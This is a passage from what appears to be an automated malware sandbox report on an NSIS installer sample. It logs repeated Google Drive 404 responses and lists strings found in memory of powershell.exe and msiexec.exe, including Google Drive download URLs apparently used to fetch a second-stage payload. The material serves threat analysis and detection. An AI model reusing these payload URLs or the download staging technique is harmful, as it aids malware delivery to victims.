/_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSPu2wOKjs9eJSKa8hFxUgC8-A3QA7fTfU11WXzoLsRM0kbdRQuCAB49KG8i7NVkd2pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:43 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5NUCwXUAOXaI8nvxWA8FMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQrhTaPy6bBY-EkXWc0zz2q7MoGQhI23JGvSVuQt7T1nmJU4XDJolUZHjnbSp6AlBkrd-dfgQEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-31KNQ2Ly-uzc3hEO2ANNvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQxf1WGEN1wlHWPrniMlnu8u_A9hBEWZj4hK4735-17eU8RfAvEzkz032GAxDcYc4Uzg-rDq1UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:48 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BJkaS_hpz-hiLYcdBg9zyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT9xr7it8Rgcr3Xz5lTsVVywixiDJXnErw1G6eJhumAf83hodMDaIkhepSZlZR--T4-DR3TzDIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:50 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-W-WIyNEwV_ghaF9GwlXr9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTDuc0UDFJO0_mm_jUyfvdGUqnSPsz-2_T52PC4_hsAPzY0kjneaYr-IlW4TZ6jTj-1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-pyT6W1G6vLBQN3Z3lb22Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR6w1T6FK8Wa5pVwgMgrAD6WAPGSykW_xqDZhdsHtc6ni5MwNTDHVwUw3xk7ipZeuPSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:54 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-g8yIBHOCvcYERNUCLEfd_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSxo-tuBjQGeatkXoG_ObH5X0NOx8HtL23YRv_K-ekRHhMEHU2X9TkuZUrkyiWUveMCFqirW2sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CXEIceGuWbSU5M0h8jXe0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQUqSEqw1JzMQWdJetYHYsuuA5QjEHsQIFViLdOidjbSAAHZj_rMSnkiZNcRxqEHnOyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mHHlDYj-fx5H8huoT0kjpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQtP_AYJThkUi3_ykgVEaAQz7AKCRpKVGt6Auzw5YvL-Mhx0DQOHov5P9kvHxRN-qSRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:28:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-oe2mNaTjgDuKNzqZHWD6hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61xJMYbWgkzkdXb05ToueUhVmXGKXTx1wW1Sk756TpbwluwyybH7wCoGzx_qSErBKQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:28:04 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KE4JNOS-28Af3EeUz6cQzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.1833058166.000000000772D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
      Source: yMXFgPOdf2.exe, 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmp, yMXFgPOdf2.exe, 00000000.00000000.1352234700.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1836180120.0000000008899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2400033827.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2433075862.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2009877653.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/TN
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/aS%
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download3
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadm
      Source: msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2329776779.00000000088CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dN
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/qS5
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=do
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ/_/DriveUntrustedCon
      Source: msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ11
      Source: msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ13
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ3
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ31.0)
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJFound~
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJHv8rBykO1328rRtEA
      Source: msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJQ1=
